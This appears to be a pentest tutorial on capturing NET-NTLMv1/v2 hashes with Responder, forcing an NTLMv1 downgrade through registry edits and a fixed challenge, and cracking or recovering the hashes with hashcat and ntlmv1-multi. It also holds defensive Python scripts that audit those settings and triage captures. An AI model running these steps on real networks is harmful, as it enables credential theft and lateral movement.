# NET-NTLMv1 recovery and cracking & NET-NTLMv2 cracking

#### NET-NTLMv1 cracking

```
sudo responder -I eth1 -rPv
# start listening
```

```
hashcat -m 5500 test1::FBI:19855A14AEAAA6BC00000000000000000000000000000000:CDDA70602BB160B8E00FAF2386E17755316DEA48DE04CB09:6783537172a9d1bc pwd.txt
# feed the captured hash to hashcat; pwd.txt is the password wordlist
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FVWhXWUFHIF5UYo8pj0ff%2F1684466165106.png?alt=media&#x26;token=7ea81652-630e-4679-9048-64ae674b9398" alt=""><figcaption></figcaption></figure>

**Note:**

For testing, NET-NTLMv2 can be downgraded to NET-NTLMv1 by changing the registry:

```
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 2 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\ /v NtlmMinClientSec /t REG_DWORD /d 536870912 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\ /v RestrictSendingNTLMTraffic /t REG_DWORD /d 0 /f
```
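The three values above are exactly the ones a defender should audit when checking whether a host can still fall back to NET-NTLMv1. The following Python checker is an added example (not from this page): it parses the text `reg query` prints for those keys and reports each setting that leaves NTLMv1 possible. The two sample outputs are constructed here, one mirroring the downgrade commands above and one for a hardened host; `parse_reg_query` and `audit_ntlm_settings` are names chosen for this example.

```python
import re

# NtlmMinClientSec flag bits (the two that matter for this page)
NTLMV2_SESSION_SECURITY = 0x00080000  # "Require NTLMv2 session security" (ESS, the "-SSP" in Responder output)
NTLM_128BIT_ENCRYPTION = 0x20000000   # "Require 128-bit encryption" (the only bit the downgrade above keeps)

# Constructed sample: what `reg query` prints on a host after the three downgrade commands above.
WEAK_HOST = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    lmcompatibilitylevel    REG_DWORD    0x2

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0
    NtlmMinClientSec    REG_DWORD    0x20000000
    RestrictSendingNTLMTraffic    REG_DWORD    0x0
"""

# Constructed sample: the same values on a host configured to refuse NTLMv1 outright.
HARDENED_HOST = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    LmCompatibilityLevel    REG_DWORD    0x5

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0
    NtlmMinClientSec    REG_DWORD    0x20080000
    RestrictSendingNTLMTraffic    REG_DWORD    0x2
"""

_DWORD_LINE = re.compile(r"^\s*(\S+)\s+REG_DWORD\s+(0x[0-9A-Fa-f]+|\d+)\s*$")


def parse_reg_query(text):
    """Return {value_name_lowercase: int} for every REG_DWORD line in `reg query` output."""
    values = {}
    for line in text.splitlines():
        m = _DWORD_LINE.match(line)
        if m:
            name, raw = m.groups()
            values[name.lower()] = int(raw, 16) if raw.lower().startswith("0x") else int(raw)
    return values


def audit_ntlm_settings(values):
    """Return a list of findings; an empty list means none of the three settings permit NTLMv1."""
    findings = []
    level = values.get("lmcompatibilitylevel")
    if level is None:
        findings.append("LmCompatibilityLevel not set: OS default applies; set it to 5 explicitly")
    elif level < 3:
        findings.append(f"LmCompatibilityLevel={level}: client will send NTLMv1 responses (want 5)")
    elif level < 5:
        findings.append(f"LmCompatibilityLevel={level}: client sends NTLMv2, but as a DC it still accepts NTLMv1 (want 5)")
    minsec = values.get("ntlmminclientsec", 0)
    if not minsec & NTLMV2_SESSION_SECURITY:
        findings.append(f"NtlmMinClientSec={minsec:#010x}: NTLMv2 session security (0x00080000) not required, "
                        "so a server can negotiate a plain NTLMv1 response")
    if not minsec & NTLM_128BIT_ENCRYPTION:
        findings.append(f"NtlmMinClientSec={minsec:#010x}: 128-bit encryption (0x20000000) not required")
    restrict = values.get("restrictsendingntlmtraffic", 0)   # absent = "Allow all" (OS default)
    if restrict == 0:
        findings.append("RestrictSendingNTLMTraffic=0: outgoing NTLM to any server is allowed (2 = deny all)")
    elif restrict == 1:
        findings.append("RestrictSendingNTLMTraffic=1: outgoing NTLM is only audited, not blocked")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_HOST), ("hardened", HARDENED_HOST)):
        print(label, audit_ntlm_settings(parse_reg_query(text)) or ["no findings"])
```

On a real host, pipe `reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa` and `reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0` into `parse_reg_query`; the checker only looks at REG_DWORD lines, so extra values in the output are ignored.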

#### NET-NTLMv1 recovery

```
vim /etc/responder/Responder.conf
# change Challenge = random to Challenge = 1122334455667788
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2F6koToxsMAEsRo23ZHzTu%2F1684466523981.png?alt=media&#x26;token=71ff886d-450f-43dc-b764-d938b6bd9d43" alt=""><figcaption></figcaption></figure>

```
sudo responder -I eth1 -rPv --lm
# start listening, adding the --lm option
# machines from recent years are protected and will not allow this over SMBv1; a Windows 7 machine can be used for testing
# note that the captured hash carries no -SSP marker
```

```
python3 ntlmv1.py --nossp test2::FBI:A94D8D327AC8EE405C860EDE65BCC24CF329406D8FD6E483:A94D8D327AC8EE405C860EDE65BCC24CF329406D8FD6E483:1122334455667788
# convert the captured hash with ntlmv1.py from ntlmv1-multi; the tool is at https://github.com/evilmog/ntlmv1-multi
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FJBuNb8WxwqSMo23BFUmM%2F1684467839815.png?alt=media&#x26;token=18d92032-cd05-4019-b1b9-254afa739bba" alt=""><figcaption></figcaption></figure>

Put the NTHASH line it outputs into [Get Cracking | crack.sh](https://crack.sh/get-cracking/) to recover it. An NTLMv1 hash captured this way can always be recovered to the NTLM hash, which can then be used for lateral movement. The site has recently been unavailable, however, so here is a screenshot from another researcher online.

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2F4GQprUhTOupZyeLjohQQ%2Ft019d8cde95559cff64.png?alt=media&#x26;token=76473f98-2272-42bf-bedd-f479988edfc1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FZwh4dtRmQVdI1ve1G5BB%2Ft01fdbe68b6ffe6a56f.png?alt=media&#x26;token=c6cbbac9-7ec8-4e17-ad0a-9668ce6572c8" alt=""><figcaption></figcaption></figure>

Image source: [Net-NTLM exploitation - windows protocol (gitbook.io)](https://daiker.gitbook.io/windows-protocol/ntlm-pian/6)

#### NET-NTLMv2 cracking

```
sudo responder -I eth1 -rPv
# start listening
```

```
hashcat -m 5600 test1::FBI:e53f04274fccde3a:68932C0FFB56AC2D5DEFE54DBD1785ED:01010000000000008050B91A418AD90147C1DEC2EEF5BE1000000000020008004B0054004300440001001E00570049004E002D003500520032003300310045004B005200450043004C0004003400570049004E002D003500520032003300310045004B005200450043004C002E004B005400430044002E004C004F00430041004C00030014004B005400430044002E004C004F00430041004C00050014004B005400430044002E004C004F00430041004C00070008008050B91A418AD901060004000200000008003000300000000000000001000000002000001C477CB4727D2946C87A7F9B4F0212D2376381EBEF50E1F583B56F08FCD7506F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310030002E00310030000000000000000000 pwd.txt
# feed the captured hash to hashcat; pwd.txt is the password wordlist
```
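The three capture formats on this page (NTLMv1 with the "-SSP" marker, plain NTLMv1 with the fixed challenge, and NTLMv2) differ only in field widths and in what the fields contain, and that difference decides how much an incident responder has to worry about a captured line. The following Python triage script is an added example, not code from this page, Responder or ntlmv1-multi: it tells the three formats apart, flags the static 1122334455667788 challenge, decodes the target-info AV pairs inside an NTLMv2 blob (MS-NLMP 2.2.2.1) so you can see which host and service name the client believed it was authenticating to, and states for each line whether password strength offers any protection. The sample lines are the ones captured on this page; `SAMPLE_LINES`, `classify_hash_line` and `triage_capture` are names chosen for this example.

```python
import struct
from datetime import datetime, timedelta, timezone

# The static challenge this page configures in Responder.conf; seeing it in a capture
# or in an NTLM AUTHENTICATE trace is a strong indicator of a fixed-challenge listener.
FIXED_CHALLENGE = "1122334455667788"

# The three captured lines shown on this page (hashcat input without the wordlist argument).
SAMPLE_LINES = [
    "test1::FBI:19855A14AEAAA6BC00000000000000000000000000000000:CDDA70602BB160B8E00FAF2386E17755316DEA48DE04CB09:6783537172a9d1bc",
    "test2::FBI:A94D8D327AC8EE405C860EDE65BCC24CF329406D8FD6E483:A94D8D327AC8EE405C860EDE65BCC24CF329406D8FD6E483:1122334455667788",
    "test1::FBI:e53f04274fccde3a:68932C0FFB56AC2D5DEFE54DBD1785ED:01010000000000008050B91A418AD90147C1DEC2EEF5BE1000000000020008004B0054004300440001001E00570049004E002D003500520032003300310045004B005200450043004C0004003400570049004E002D003500520032003300310045004B005200450043004C002E004B005400430044002E004C004F00430041004C00030014004B005400430044002E004C004F00430041004C00050014004B005400430044002E004C004F00430041004C00070008008050B91A418AD901060004000200000008003000300000000000000001000000002000001C477CB4727D2946C87A7F9B4F0212D2376381EBEF50E1F583B56F08FCD7506F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310030002E00310030000000000000000000",
]

# AV_PAIR ids from MS-NLMP 2.2.2.1 (the target info carried inside the NTLMv2 blob)
AV_IDS = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
          5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 8: "SingleHost", 9: "TargetName",
          10: "ChannelBindings"}
STRING_AVS = {1, 2, 3, 4, 5, 9}  # UTF-16LE strings; the rest are kept as raw hex


def parse_ntlmv2_blob(blob_hex):
    """Decode the NTLMv2_CLIENT_CHALLENGE structure that follows NTProofStr in a -m 5600 line."""
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01":
        raise ValueError("not an NTLMv2 client challenge (RespType/HiRespType must be 01 01)")
    # RespType(1) HiRespType(1) Reserved1(2) Reserved2(4) Timestamp(8) ClientChallenge(8) Reserved3(4) AvPairs...
    filetime, client_chal = struct.unpack_from("<Q8s", blob, 8)
    info = {
        "client_challenge": client_chal.hex(),
        # FILETIME: 100 ns ticks since 1601-01-01 UTC
        "timestamp_utc": (datetime(1601, 1, 1, tzinfo=timezone.utc)
                          + timedelta(microseconds=filetime // 10)).isoformat(),
    }
    off = 28
    while off + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == 0:          # MsvAvEOL terminates the list
            break
        value = blob[off:off + av_len]
        off += av_len
        name = AV_IDS.get(av_id, f"Av{av_id:#06x}")
        info[name] = value.decode("utf-16-le") if av_id in STRING_AVS else value.hex()
    return info


def classify_hash_line(line):
    """Tell NTLMv1, NTLMv1 with ESS ("-SSP") and NTLMv2 apart and state what each exposes."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("expected user::domain:field:field:field")
    user, _, domain, f1, f2, f3 = parts
    result = {"user": user, "domain": domain}
    if len(f1) == 48 and len(f2) == 48 and len(f3) == 16:
        # NET-NTLMv1: LM response, NT response, 8-byte server challenge (hashcat -m 5500).
        # With ESS the LM field is an 8-byte client nonce padded with zeros and the NT response
        # is computed over MD5(server_challenge || client_nonce)[:8] rather than the raw server
        # challenge; Responder labels such captures "-SSP".
        ess = f1[16:] == "0" * 32
        result.update(kind="NTLMv1-SSP" if ess else "NTLMv1", hashcat_mode=5500, ess=ess,
                      server_challenge=f3.lower(), fixed_challenge=f3.lower() == FIXED_CHALLENGE,
                      # DES over a challenge that travelled in clear: recovering the NT hash is a
                      # key search, not a password guess, so password strength is irrelevant.
                      password_strength_matters=False,
                      triage="treat the NT hash as exposed; reset the account and disable NTLMv1")
        return result
    if len(f1) == 16 and len(f2) == 32:
        # NET-NTLMv2: server challenge, NTProofStr, blob (hashcat -m 5600)
        result.update(kind="NTLMv2", hashcat_mode=5600, ess=False, server_challenge=f1.lower(),
                      fixed_challenge=f1.lower() == FIXED_CHALLENGE, password_strength_matters=True,
                      triage="exposed only to an offline dictionary attack; the blob shows the target the client believed it was reaching",
                      target_info=parse_ntlmv2_blob(f3))
        return result
    raise ValueError("unrecognised field layout")


def triage_capture(lines):
    """Classify every line of a Responder-style capture (e.g. one recovered during incident response)."""
    return [classify_hash_line(line) for line in lines]


if __name__ == "__main__":
    for r in triage_capture(SAMPLE_LINES):
        chal = "fixed challenge" if r["fixed_challenge"] else "random challenge"
        print(r["user"], r["kind"], chal, "-", r["triage"])
```

The NTLMv2 blob on this page decodes to a TargetName of `cifs/10.10.10.10`, i.e. the client connected by IP address rather than by hostname, which is the pattern a name-poisoning listener produces and a useful thing to hunt for in authentication telemetry.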

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FuN9YAFN97Fj54ewiYhTY%2F1684465652541.png?alt=media&#x26;token=8ab25c97-f422-4da1-b5c0-f5b007e6e92b" alt=""><figcaption></figcaption></figure>
